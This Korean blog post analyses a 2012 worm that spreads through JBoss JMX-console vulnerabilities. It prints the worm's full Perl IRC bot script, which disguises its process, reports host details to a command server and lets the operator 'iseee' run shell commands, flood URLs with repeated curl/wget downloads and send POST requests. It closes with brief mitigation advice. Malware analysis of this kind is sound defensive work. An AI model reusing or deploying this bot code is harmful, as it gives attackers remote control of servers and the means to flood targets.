JMX 취약점을 이용한 JBoss Worm

2월 13, 2012

JMX 취약점을 이용한 JBoss Worm

JBoss 의 JMX 취약점을 이용한 Worm 이 최근들어 곳곳에서 보이고 있습니다. 그에 따른 예방책과 해결책을 찾기위해 분석을 시작합니다.

JBoss Worm 분석

현재 알려진 worm 은 perl 스크립트를 이용하여 JMX console 을 호출하는 방식을 사용하고 있습니다.

.syssync.pl

#!/usr/bin/perl ############################### use IO::Socket::INET; ############################### my $processo = "/usr/local/apache/bin/httpd -DSSL"; my $pid=fork; exit if $pid; $0="$processo"." "x16; ############################### # Server Config ############################### my @sops =("xxx.xxx.xxx.xxx"); my $port=9000; my $chan="#newhk"; my $boxing = `uname -a`; $user = `whoami`; $boxing =~ s/\r//g; $boxing =~ s/\n//g; $boxing =~ s/ //g; $boxing =~ s/\s//g; $user =~ s/\r//g; $user =~ s/\n//g; $user =~ s/ //g; $user =~ s/\s//g; ######################### #	Config		# ######################### while(1) { my $nick="srv[".int(rand(9999999))."]"; retry: close($sk); my $server = ""; while(length($server)<10) { $server = $sops[int(rand(9))]; } sleep(3); my $sk = IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>$port,Proto=>"tcp") or goto retry; $sk->autoflush(1); print $sk "POST /index.php HTTP/1.1\r\nHost: $server:$port\r\nUser-Agent: Mozilla/5.0\r\nContent-Length: 385256291721361\r\n\r\nfile1=MZ%90%0a%0d\r\n"; print $sk "NICK $nick\r\n"; print $sk "USER ".$user." 8 * : ".$user."\r\n"; while($line = <$sk>){ $line =~ s/\r\n$//; if ($line=~ /^PING \:(.*)/) { print $sk "PONG :$1\r\n"; } if($line =~ /welcome\sto/i) { sleep(2); print $sk "JOIN $chan\r\n"; sleep(1); print $sk "PRIVMSG $chan :UserName=$boxing\r\n"; } ###################### # Commands # # # ###################### ### !die if ($line=~ /PRIVMSG (.*) :.die/){ $owner=$line; if($owner=~/iseee/gi) { sendsk($sk, "QUIT"); die; } } ### end of !die ### !rsh if ($line =~ /PRIVMSG (.*) :.rsh\s"(.*)"/){ $owner=$line; $de=$2; if($owner=~/iseee/gi) { @shell=`$de`; foreach $line (@shell) { sendsk($sk, "PRIVMSG iseee :$line\r\n"); sleep(1); } } } ### end of !rsh ### !get "[url]" "[times]" if ($line=~ /PRIVMSG (.*) :.get\s"(.*)"\s"(.*)"/){ $owner=$line; $url=$2; $mult=$3; if($owner=~/iseee/gi) { $url=~/http:\/\/(.*)\/(.*)/g; for($xz=0;$xz<=$mult;$xz++) { system("curl ".$url.">/dev/null&"); `curl "$url">/dev/null&`; system("wget ".$url.">/dev/null&"); `wget "$url">/dev/null&`; system("wget $url>/dev/null&"); } sendsk($sk, "PRIVMSG iseee :Got $host/$path - $mult times\r\n"); } } ### End of !get ### !post "[url]" "[data]" if ($line=~ /PRIVMSG (.*) :.post\s"(.*)"\s"(.*)"/){ $owner=$line; $url=$2; $ddata=$3; if($owner=~/iseee/gi) { $url=~/http:\/\/(.*)\/(.*)/g; $host=$1; $path=$2; my $sck=new IO::Socket::INET(PeerAddr=>$host, PeerPort=>80); print $sck 	"POST /$path HTTP/1.0\r\n". 		"Host: $host\r\n". 		"Connection: close\r\n". 		"Content-Length: ".length($ddata)."\r\n\r\n".$ddata; sleep(1); close($sck); sendsk($sk, "PRIVMSG (.*) :Posted $host/$path - $mult\r\n"); } } ### End of !post ###################### # End of Commands # # # ###################### } } sub sendsk() { if ($#_ == '1') { my $sk = $_[0]; print $sk "$_[1]\n"; } else { print $sk "$_[0]\n"; } }

해당 perl 스크립트가 실행되면, IRC 서버에 접속하게 되어 닉네임이 "iseee" 인 사용자의 명령에 따라 작업을 수행하게 됩니다.

Worm 수행 작업

해당 worm 은 다음과 같이 4가지 작업을 수행합니다.

작업	IRC 메시지	처리 결과
종료	PRIVMSG iseee :.die	perl 스크립트 종료
명령어 실행	PRIVMSG iseee :.rsh " [명령어] "	해당 명령어를 수행
다운로드	PRIVMSG iseee :.get " [url] " " [반복횟수] "	해당 url 을 반복횟수 만큼 다운로드
POST 연결	PRIVMSG iseee :.post " [url] " " [데이터] "	해당 url 에 데이터를 포함하여 POST 연결 요청

예방책 및 해결책 (확인 중...)

최초에 jmx-console 의 취약점으로 인해 들어오기 때문에 jmx-console 인증 설정이 우선 시 되어야 합니다. jmx-console 을 막았음에도 계속해서 perl 스크립트가 재생되는 것으로 보아 별도의 숙주가 있을 것으로 예상됩니다.

추후, 새로 알게 되는 정보가 있으면 공유하도록 하겠습니다.

이 블로그 검색

불친절한자수씨